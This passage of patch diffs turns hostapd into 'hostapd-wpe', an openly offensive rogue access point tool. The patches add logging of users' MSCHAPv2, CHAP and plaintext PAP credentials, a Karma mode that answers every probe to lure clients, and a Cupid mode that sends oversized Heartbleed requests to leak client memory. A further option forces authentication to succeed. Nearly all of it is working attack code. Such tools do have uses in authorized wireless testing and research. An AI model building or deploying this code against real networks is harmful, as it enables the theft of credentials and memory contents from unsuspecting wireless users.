+ // set payload size
+ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3];
+ s2n(wpe_conf.wpe_hb_payload_size, p);
+
+ return wpe_hb_msg;
+}
+
diff -rupN hostapd-2.2/src/wpe/wpe.h hostapd-2.2-wpe/src/wpe/wpe.h
--- hostapd-2.2/src/wpe/wpe.h 1969-12-31 19:00:00.000000000 -0500
+++ hostapd-2.2-wpe/src/wpe/wpe.h 2014-08-14 08:45:54.657127982 -0400
@@ -0,0 +1,50 @@
+/*
+ wpe.h -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+#include <openssl/ssl.h>
+
+struct wpe_config {
+ char *wpe_logfile;
+ FILE *wpe_logfile_fp;
+ unsigned int wpe_enable_karma;
+ unsigned int wpe_enable_cupid;
+ unsigned int wpe_enable_return_success;
+ unsigned int wpe_hb_send_before_handshake:1;
+ unsigned int wpe_hb_send_before_appdata:1;
+ unsigned int wpe_hb_send_after_appdata:1;
+ unsigned int wpe_hb_payload_size;
+ unsigned int wpe_hb_num_tries;
+ unsigned int wpe_hb_num_repeats;
+};
+
+extern struct wpe_config wpe_conf;
+
+extern char wpe_hb_msg[];
+extern size_t wpe_hb_msg_len;
+
+//#define WPE_HB_MSG_LEN 8
+
+#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \
+ (((unsigned int)(c[1])) )),c+=2)
+
+#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \
+ c[1]=(unsigned char)(((s) )&0xff)),c+=2)
+
+
+void wpe_log_file_and_stdout(char const *fmt, ...);
+void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len);
+void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len);
+void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg);
+char *wpe_hb_clear();


@ -1,21 +0,0 @@
--- hostapd-2.5-wpe.orig/src/eap_server/eap_server_mschapv2.c 2015-12-06 22:10:05.000000000 +0800
+++ hostapd-2.5-wpe/src/eap_server/eap_server_mschapv2.c 2015-12-06 22:23:31.459478038 +0800
@@ -330,8 +330,6 @@
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
- challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
- wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -376,6 +374,9 @@
}
#endif /* CONFIG_TESTING_OPTIONS */
+ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
+
if (username_len != user_len ||
os_memcmp(username, user, username_len) != 0) {
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Mismatch in user names");


@ -1,855 +0,0 @@
diff -rupN hostapd-2.5/hostapd/config_file.c hostapd-2.5-wpe/hostapd/config_file.c
--- hostapd-2.5/hostapd/config_file.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/hostapd/config_file.c 2015-10-25 19:25:49.543351020 +0100
@@ -21,6 +21,7 @@
#include "ap/ap_config.h"
#include "config_file.h"
+#include "wpe/wpe.h"
#ifndef CONFIG_NO_RADIUS
#ifdef EAP_SERVER
@@ -2056,6 +2057,20 @@ static int hostapd_config_fill(struct ho
return 1;
}
wpa_printf(MSG_DEBUG, "eapol_version=%d", bss->eapol_version);
+ } else if (os_strcmp(buf, "wpe_logfile") == 0) {
+ wpe_conf.wpe_logfile = os_strdup(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_handshake") == 0) {
+ wpe_conf.wpe_hb_send_before_handshake = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_before_appdata") == 0) {
+ wpe_conf.wpe_hb_send_before_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_send_after_appdata") == 0) {
+ wpe_conf.wpe_hb_send_after_appdata = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_payload_size") == 0) {
+ wpe_conf.wpe_hb_payload_size = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_repeats") == 0) {
+ wpe_conf.wpe_hb_num_repeats = atoi(pos);
+ } else if (os_strcmp(buf, "wpe_hb_num_tries") == 0) {
+ wpe_conf.wpe_hb_num_tries = atoi(pos);
#ifdef EAP_SERVER
} else if (os_strcmp(buf, "eap_authenticator") == 0) {
bss->eap_server = atoi(pos);
diff -rupN hostapd-2.5/hostapd/main.c hostapd-2.5-wpe/hostapd/main.c
--- hostapd-2.5/hostapd/main.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/hostapd/main.c 2015-10-25 19:35:41.220483130 +0100
@@ -29,6 +29,7 @@
#include "eap_register.h"
#include "ctrl_iface.h"
+#include "wpe/wpe.h"
struct hapd_global {
void **drv_priv;
@@ -422,11 +423,17 @@ static int hostapd_global_run(struct hap
static void show_version(void)
{
fprintf(stderr,
- "hostapd v" VERSION_STR "\n"
- "User space daemon for IEEE 802.11 AP management,\n"
+ "hostapd-wpe v" VERSION_STR "\n"
+ "User space daemon for IEEE 802.11 AP management,\n"
"IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator\n"
"Copyright (c) 2002-2015, Jouni Malinen <j@w1.fi> "
- "and contributors\n");
+ "and contributors\n"
+ "-----------------------------------------------------\n"
+ "WPE (Wireless Pwnage Edition)\n"
+ "This version has been cleverly modified to target\n"
+ "wired and wireless users.\n"
+ "Brad Antoniewicz <@brad_anton>\n"
+ "Foundstone\n");
}
@@ -435,7 +442,7 @@ static void usage(void)
show_version();
fprintf(stderr,
"\n"
- "usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] "
+ "usage: hostapd-wpe [-hdBKtvskc] [-P <PID file>] [-e <entropy file>] "
"\\\n"
" [-g <global ctrl_iface>] [-G <group>] \\\n"
" <configuration file(s)>\n"
@@ -457,7 +464,12 @@ static void usage(void)
" (records all messages regardless of debug verbosity)\n"
#endif /* CONFIG_DEBUG_LINUX_TRACING */
" -t include timestamps in some debug messages\n"
- " -v show hostapd version\n");
+ " -v show hostapd version\n\n"
+ " WPE Options -------------------\n"
+ " (credential logging always enabled)\n"
+ " -s Return Success where possible\n"
+ " -k Karma Mode (Respond to all probes)\n"
+ " -c Cupid Mode (Heartbleed clients)\n\n");
exit(1);
}
@@ -587,7 +599,8 @@ int main(int argc, char *argv[])
interfaces.global_ctrl_dst = NULL;
for (;;) {
- c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:");
+ c = getopt(argc, argv, "b:Bde:f:hKP:Ttu:vg:G:kcs");
+
if (c < 0)
break;
switch (c) {
@@ -648,6 +661,15 @@ int main(int argc, char *argv[])
case 'u':
return gen_uuid(optarg);
#endif /* CONFIG_WPS */
+ case 'k':
+ wpe_conf.wpe_enable_karma++;
+ break;
+ case 'c':
+ wpe_conf.wpe_enable_cupid++;
+ break;
+ case 's':
+ wpe_conf.wpe_enable_return_success++;
+ break;
default:
usage();
break;
diff -rupN hostapd-2.5/hostapd/Makefile hostapd-2.5-wpe/hostapd/Makefile
--- hostapd-2.5/hostapd/Makefile 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/hostapd/Makefile 2015-10-25 19:40:08.627224025 +0100
@@ -62,6 +62,7 @@ OBJS += ../src/ap/preauth_auth.o
OBJS += ../src/ap/pmksa_cache_auth.o
OBJS += ../src/ap/ieee802_11_shared.o
OBJS += ../src/ap/beacon.o
+OBJS += ../src/wpe/wpe.o
OBJS += ../src/ap/bss_load.o
OBJS_c = hostapd_cli.o ../src/common/wpa_ctrl.o ../src/utils/os_$(CONFIG_OS).o
@@ -934,7 +935,7 @@ OBJS += ../src/fst/fst_ctrl_iface.o
endif
endif
-ALL=hostapd hostapd_cli
+ALL=hostapd-wpe hostapd-wpe_cli
all: verify_config $(ALL)
@@ -981,15 +982,15 @@ install: $(addprefix $(DESTDIR)$(BINDIR)
BCHECK=../src/drivers/build.hostapd
-hostapd: $(BCHECK) $(OBJS)
- $(Q)$(CC) $(LDFLAGS) -o hostapd $(OBJS) $(LIBS)
+hostapd-wpe: $(BCHECK) $(OBJS)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe $(OBJS) $(LIBS)
@$(E) " LD " $@
ifdef CONFIG_WPA_TRACE
OBJS_c += ../src/utils/trace.o
endif
-hostapd_cli: $(OBJS_c)
- $(Q)$(CC) $(LDFLAGS) -o hostapd_cli $(OBJS_c) $(LIBS_c)
+hostapd-wpe_cli: $(OBJS_c)
+ $(Q)$(CC) $(LDFLAGS) -o hostapd-wpe_cli $(OBJS_c) $(LIBS_c)
@$(E) " LD " $@
NOBJS = nt_password_hash.o ../src/crypto/ms_funcs.o $(SHA1OBJS)
@@ -1036,7 +1037,7 @@ lcov-html:
clean:
$(MAKE) -C ../src clean
- rm -f core *~ *.o hostapd hostapd_cli nt_password_hash hlr_auc_gw
+ rm -f core *~ *.o hostapd-wpe hostapd-wpe_cli nt_password_hash hlr_auc_gw
rm -f *.d *.gcno *.gcda *.gcov
rm -f lcov.info
rm -rf lcov-html
diff -rupN hostapd-2.5/src/ap/beacon.c hostapd-2.5-wpe/src/ap/beacon.c
--- hostapd-2.5/src/ap/beacon.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/ap/beacon.c 2015-10-25 19:45:25.530335207 +0100
@@ -30,6 +30,7 @@
#include "hs20.h"
#include "dfs.h"
+#include "wpe/wpe.h"
#ifdef NEED_AP_MLME
@@ -754,6 +755,13 @@ void handle_probe_req(struct hostapd_dat
}
#endif /* CONFIG_P2P */
+ if (wpe_conf.wpe_enable_karma && elems.ssid_len > 0) {
+ wpa_printf(MSG_MSGDUMP,"[WPE] Probe request from " MACSTR ", changing SSID to '%s'", MAC2STR(mgmt->sa), wpa_ssid_txt(elems.ssid, elems.ssid_len));
+ hostapd_set_ssid(hapd,elems.ssid,elems.ssid_len);
+ os_memcpy(&hapd->conf->ssid.ssid,elems.ssid,elems.ssid_len);
+ hapd->conf->ssid.ssid_len = elems.ssid_len;
+ }
+
res = ssid_match(hapd, elems.ssid, elems.ssid_len,
elems.ssid_list, elems.ssid_list_len);
if (res == NO_SSID_MATCH) {
diff -rupN hostapd-2.5/src/ap/ieee802_11.c hostapd-2.5-wpe/src/ap/ieee802_11.c
--- hostapd-2.5/src/ap/ieee802_11.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/ap/ieee802_11.c 2015-10-25 19:47:22.673322551 +0100
@@ -43,6 +43,7 @@
#include "ieee802_11.h"
#include "dfs.h"
+#include "wpe/wpe.h"
u8 * hostapd_eid_supp_rates(struct hostapd_data *hapd, u8 *eid)
{
@@ -1249,8 +1250,8 @@ static u16 check_ssid(struct hostapd_dat
if (ssid_ie == NULL)
return WLAN_STATUS_UNSPECIFIED_FAILURE;
- if (ssid_ie_len != hapd->conf->ssid.ssid_len ||
- os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0) {
+ if ((!wpe_conf.wpe_enable_karma) && (ssid_ie_len != hapd->conf->ssid.ssid_len ||
+ os_memcmp(ssid_ie, hapd->conf->ssid.ssid, ssid_ie_len) != 0)) {
hostapd_logger(hapd, sta->addr, HOSTAPD_MODULE_IEEE80211,
HOSTAPD_LEVEL_INFO,
"Station tried to associate with unknown SSID "
diff -rupN hostapd-2.5/src/crypto/tls_openssl.c hostapd-2.5-wpe/src/crypto/tls_openssl.c
--- hostapd-2.5/src/crypto/tls_openssl.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/crypto/tls_openssl.c 2015-10-25 20:03:51.323951441 +0100
@@ -20,6 +20,7 @@
#include <openssl/err.h>
#include <openssl/pkcs12.h>
#include <openssl/x509v3.h>
+#include <openssl/rand.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif /* OPENSSL_NO_ENGINE */
@@ -36,6 +37,8 @@
#include "sha256.h"
#include "tls.h"
+#include "wpe/wpe.h"
+
#if OPENSSL_VERSION_NUMBER < 0x10000000L
/* ERR_remove_thread_state replaces ERR_remove_state and the latter is
* deprecated. However, OpenSSL 0.9.8 doesn't include
@@ -73,6 +76,8 @@ static BIO * BIO_from_keystore(const cha
}
#endif /* ANDROID */
+int wpe_hb_enc(struct tls_connection *conn); // WPE: To limit changes up top
+
static int tls_openssl_ref_count = 0;
static int tls_ex_idx_session = -1;
@@ -1138,7 +1143,10 @@ struct tls_connection * tls_connection_i
conn->context = context;
SSL_set_app_data(conn->ssl, conn);
- SSL_set_msg_callback(conn->ssl, tls_msg_cb);
+ if (wpe_conf.wpe_enable_cupid)
+ SSL_set_msg_callback(conn->ssl, wpe_hb_cb);
+ else
+ SSL_set_msg_callback(conn->ssl, tls_msg_cb);
SSL_set_msg_callback_arg(conn->ssl, conn);
options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 |
SSL_OP_SINGLE_DH_USE;
@@ -3089,8 +3097,10 @@ static struct wpabuf *
openssl_handshake(struct tls_connection *conn, const struct wpabuf *in_data,
int server)
{
- int res;
+ int res,i;
struct wpabuf *out_data;
+ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2;
+
/*
* Give TLS handshake data from the server (if available) to OpenSSL
@@ -3150,6 +3160,25 @@ openssl_handshake(struct tls_connection
}
wpabuf_put(out_data, res);
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) {
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n");
+ wpe_hb_ptr1 = NULL;
+ for (i=0; i < wpe_conf.wpe_hb_num_repeats; i++) {
+ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1);
+ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1);
+ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1);
+ if (wpe_hb_ptr1) {
+ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2);
+ } else {
+ wpe_hb_ptr1 = wpe_hb_ptr2;
+ }
+ }
+ conn->ssl->tlsext_hb_pending = 1;
+ wpe_conf.wpe_hb_num_tries--;
+ return wpe_hb_ptr1;
+ }
+
return out_data;
}
@@ -3265,6 +3294,10 @@ struct wpabuf * tls_connection_encrypt(v
tls_show_errors(MSG_INFO, __func__, "BIO_reset failed");
return NULL;
}
+
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_appdata)
+ wpe_hb_enc(conn);
+
res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data));
if (res < 0) {
tls_show_errors(MSG_INFO, __func__,
@@ -3272,6 +3305,9 @@ struct wpabuf * tls_connection_encrypt(v
return NULL;
}
+ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata)
+ wpe_hb_enc(conn);
+
/* Read encrypted data to be sent to the server */
buf = wpabuf_alloc(wpabuf_len(in_data) + 300);
if (buf == NULL)
@@ -4069,6 +4105,65 @@ int tls_connection_set_session_ticket_cb
#endif /* EAP_FAST || EAP_FAST_DYNAMIC || EAP_SERVER_FAST */
}
+int wpe_hb_enc(struct tls_connection *conn) {
+ unsigned char *cbuf, *p;
+
+ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */
+ unsigned int padding = 16; //default: 16 /* Use minimum padding */
+
+ if (!SSL_is_init_finished(conn->ssl)) {
+ return -1;
+ }
+
+ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED ||
+ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) {
+ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n");
+ } else {
+ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n");
+ }
+
+ /* Check if padding is too long, payload and padding
+ * must not exceed 2^14 - 3 = 16381 bytes in total.
+ */
+ OPENSSL_assert(real_payload + padding <= 16381);
+
+ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding);
+
+ if(cbuf==NULL)
+ return -1;
+
+ p = cbuf;
+
+ *p++ = TLS1_HB_REQUEST;
+
+
+ /* Payload length (18 bytes here) */
+ //s2n(payload, p); /* standards compliant payload */
+ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! */
+ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */
+
+ /* Sequence number */
+ s2n(conn->ssl->tlsext_hb_seq, p);
+ /* 16 random bytes */
+ RAND_pseudo_bytes(p, 16);
+ //RAND_bytes(p, 16);
+ p += 16;
+ /* Random padding */
+ RAND_pseudo_bytes(p, padding);
+ //RAND_bytes(p, padding);
+
+ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size);
+ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding);
+
+ /* Send heartbeat request */
+ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT,
+ cbuf, 3 + real_payload + padding) >= 0)
+ conn->ssl->tlsext_hb_pending = 1;
+ OPENSSL_free(cbuf);
+
+ return 0;
+}
+
int tls_get_library_version(char *buf, size_t buf_len)
{
diff -rupN hostapd-2.5/src/eap_server/eap_server.c hostapd-2.5-wpe/src/eap_server/eap_server.c
--- hostapd-2.5/src/eap_server/eap_server.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server.c 2015-10-25 20:06:23.685009957 +0100
@@ -23,7 +23,8 @@
#define STATE_MACHINE_DATA struct eap_sm
#define STATE_MACHINE_DEBUG_PREFIX "EAP"
-#define EAP_MAX_AUTH_ROUNDS 50
+//#define EAP_MAX_AUTH_ROUNDS 50
+#define EAP_MAX_AUTH_ROUNDS 50000 // wpe >:)
static void eap_user_free(struct eap_user *user);
@@ -164,6 +165,8 @@ int eap_user_get(struct eap_sm *sm, cons
{
struct eap_user *user;
+ char ident = 't';
+
if (sm == NULL || sm->eapol_cb == NULL ||
sm->eapol_cb->get_eap_user == NULL)
return -1;
@@ -175,6 +178,11 @@ int eap_user_get(struct eap_sm *sm, cons
if (user == NULL)
return -1;
+ if (phase2) {
+ identity = (const u8 *)&ident;
+ identity_len = 1;
+ }
+
if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity,
identity_len, phase2, user) != 0) {
eap_user_free(user);
diff -rupN hostapd-2.5/src/eap_server/eap_server_mschapv2.c hostapd-2.5-wpe/src/eap_server/eap_server_mschapv2.c
--- hostapd-2.5/src/eap_server/eap_server_mschapv2.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server_mschapv2.c 2015-10-25 20:11:57.318992345 +0100
@@ -13,6 +13,7 @@
#include "crypto/random.h"
#include "eap_i.h"
+#include "wpe/wpe.h"
struct eap_mschapv2_hdr {
u8 op_code; /* MSCHAPV2_OP_* */
@@ -291,7 +292,7 @@ static void eap_mschapv2_process_respons
size_t username_len, user_len;
int res;
char *buf;
-
+ u8 wpe_challenge_hash[8];
pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
&len);
if (pos == NULL || len < 1)
@@ -329,6 +330,8 @@ static void eap_mschapv2_process_respons
wpa_hexdump(MSG_MSGDUMP, "EAP-MSCHAPV2: NT-Response", nt_response, 24);
wpa_printf(MSG_MSGDUMP, "EAP-MSCHAPV2: Flags 0x%x", flags);
wpa_hexdump_ascii(MSG_MSGDUMP, "EAP-MSCHAPV2: Name", name, name_len);
+ challenge_hash(peer_challenge, data->auth_challenge, name, name_len, wpe_challenge_hash);
+ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
buf = os_malloc(name_len * 4 + 1);
if (buf) {
@@ -406,6 +409,11 @@ static void eap_mschapv2_process_respons
return;
}
+ if (wpe_conf.wpe_enable_return_success) {
+ os_memset((void *)nt_response, 0, 24);
+ os_memset((void *)expected, 0, 24);
+ }
+
if (os_memcmp_const(nt_response, expected, 24) == 0) {
const u8 *pw_hash;
u8 pw_hash_buf[16], pw_hash_hash[16];
@@ -446,6 +454,8 @@ static void eap_mschapv2_process_respons
wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
data->state = FAILURE_REQ;
}
+ if (wpe_conf.wpe_enable_return_success)
+ data->state = SUCCESS;
}
diff -rupN hostapd-2.5/src/eap_server/eap_server_peap.c hostapd-2.5-wpe/src/eap_server/eap_server_peap.c
--- hostapd-2.5/src/eap_server/eap_server_peap.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server_peap.c 2015-10-25 20:17:20.693699507 +0100
@@ -17,7 +17,7 @@
#include "eap_common/eap_tlv_common.h"
#include "eap_common/eap_peap_common.h"
#include "tncs.h"
-
+#include "wpe/wpe.h"
/* Maximum supported PEAP version
* 0 = Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
diff -rupN hostapd-2.5/src/eap_server/eap_server_ttls.c hostapd-2.5-wpe/src/eap_server/eap_server_ttls.c
--- hostapd-2.5/src/eap_server/eap_server_ttls.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/eap_server/eap_server_ttls.c 2015-10-25 20:46:06.516768323 +0100
@@ -16,7 +16,7 @@
#include "eap_server/eap_tls_common.h"
#include "eap_common/chap.h"
#include "eap_common/eap_ttls.h"
-
+#include "wpe/wpe.h"
#define EAP_TTLS_VERSION 0
@@ -530,7 +530,7 @@ static void eap_ttls_process_phase2_pap(
const u8 *user_password,
size_t user_password_len)
{
- if (!sm->user || !sm->user->password || sm->user->password_hash ||
+ if (!sm->user || !sm->user->password || sm->user->password_hash ||
!(sm->user->ttls_auth & EAP_TTLS_AUTH_PAP)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: No plaintext user "
"password configured");
@@ -538,9 +538,11 @@ static void eap_ttls_process_phase2_pap(
return;
}
- if (sm->user->password_len != user_password_len ||
+ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
+
+ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
os_memcmp_const(sm->user->password, user_password,
- user_password_len) != 0) {
+ user_password_len) != 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
eap_ttls_state(data, FAILURE);
return;
@@ -602,9 +604,10 @@ static void eap_ttls_process_phase2_chap
/* MD5(Ident + Password + Challenge) */
chap_md5(password[0], sm->user->password, sm->user->password_len,
challenge, challenge_len, hash);
+
+ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) ==
- 0) {
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -671,8 +674,11 @@ static void eap_ttls_process_phase2_msch
else
nt_challenge_response(challenge, sm->user->password,
sm->user->password_len, nt_response);
+
+ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) {
+
+ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) {
wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response");
eap_ttls_state(data, SUCCESS);
eap_ttls_valid_session(sm, data);
@@ -694,7 +700,7 @@ static void eap_ttls_process_phase2_msch
u8 *response, size_t response_len)
{
u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge,
- *auth_challenge;
+ *auth_challenge, wpe_challenge_hash[8];
size_t username_len, i;
if (challenge == NULL || response == NULL ||
@@ -778,7 +784,11 @@ static void eap_ttls_process_phase2_msch
nt_response);
}
- rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+ rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8;
+
+ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash);
+ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24);
+
#ifdef CONFIG_TESTING_OPTIONS
{
u8 challenge2[8];
diff -rupN hostapd-2.5/src/Makefile hostapd-2.5-wpe/src/Makefile
--- hostapd-2.5/src/Makefile 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/Makefile 2015-10-25 20:46:39.159659989 +0100
@@ -1,4 +1,4 @@
-SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps
+SUBDIRS=ap common crypto drivers eapol_auth eapol_supp eap_common eap_peer eap_server l2_packet p2p pae radius rsn_supp tls utils wps wpe
SUBDIRS += fst
all:
diff -rupN hostapd-2.5/src/utils/wpa_debug.c hostapd-2.5-wpe/src/utils/wpa_debug.c
--- hostapd-2.5/src/utils/wpa_debug.c 2015-09-27 21:02:05.000000000 +0200
+++ hostapd-2.5-wpe/src/utils/wpa_debug.c 2015-10-25 20:48:00.797890010 +0100
@@ -30,7 +30,7 @@ static FILE *wpa_debug_tracing_file = NU
int wpa_debug_level = MSG_INFO;
-int wpa_debug_show_keys = 0;
+int wpa_debug_show_keys = 1; // WPE >:)
int wpa_debug_timestamp = 0;
diff -rupN hostapd-2.5/src/wpe/Makefile hostapd-2.5-wpe/src/wpe/Makefile
--- hostapd-2.5/src/wpe/Makefile 1970-01-01 01:00:00.000000000 +0100
+++ hostapd-2.5-wpe/src/wpe/Makefile 2015-10-25 16:52:26.349508655 +0100
@@ -0,0 +1,8 @@
+all:
+ @echo Nothing to be made.
+
+clean:
+ rm -f *~ *.o *.d *.gcno *.gcda *.gcov
+
+install:
+ @echo Nothing to be made.
diff -rupN hostapd-2.5/src/wpe/wpe.c hostapd-2.5-wpe/src/wpe/wpe.c
--- hostapd-2.5/src/wpe/wpe.c 1970-01-01 01:00:00.000000000 +0100
+++ hostapd-2.5-wpe/src/wpe/wpe.c 2015-10-25 16:52:26.349508655 +0100
@@ -0,0 +1,209 @@
+/*
+ wpe.c -
+ brad.antoniewicz@foundstone.com
+ Implements WPE (Wireless Pwnage Edition) functionality within
+ hostapd.
+
+ WPE functionality focuses on targeting connecting users. At
+ it's core it implements credential logging (originally
+ implemented in FreeRADIUS-WPE), but also includes other patches
+ for other client attacks that have been modified to some extend.
+
+ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe
+ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff
+ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd
+*/
+
+#include <time.h>
+#include <openssl/ssl.h>
+#include "includes.h"
+#include "common.h"
+#include "wpe/wpe.h"
+#include "utils/wpa_debug.h"
+
+#define wpe_logfile_default_location "./hostapd-wpe.log"
+
+
+#define MSCHAPV2_CHAL_HASH_LEN 8
+#define MSCHAPV2_CHAL_LEN 16
+#define MSCHAPV2_RESP_LEN 24
+
+char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff";
+size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]);
+
+struct wpe_config wpe_conf = {
+ .wpe_logfile = wpe_logfile_default_location,
+ .wpe_logfile_fp = NULL,
+ .wpe_enable_karma = 0,
+ .wpe_enable_cupid = 0,
+ .wpe_enable_return_success = 0,
+ .wpe_hb_send_before_handshake = 1,
+ .wpe_hb_send_before_appdata = 0,
+ .wpe_hb_send_after_appdata = 0,
+ .wpe_hb_payload_size = 50000,
+ .wpe_hb_num_tries = 1,
+ .wpe_hb_num_repeats = 10
+};
+
+void wpe_log_file_and_stdout(char const *fmt, ...) {
+
+ if ( wpe_conf.wpe_logfile_fp == NULL ) {
+ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a");
+ if ( wpe_conf.wpe_logfile_fp == NULL )
+ printf("WPE: Cannot file log file");
+ }
+
+ va_list ap;
+
+ va_start(ap, fmt);
+ vprintf(fmt, ap);
+ va_end(ap);
+
+ va_start(ap, fmt);
+ if ( wpe_conf.wpe_logfile_fp != NULL )
+ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap);
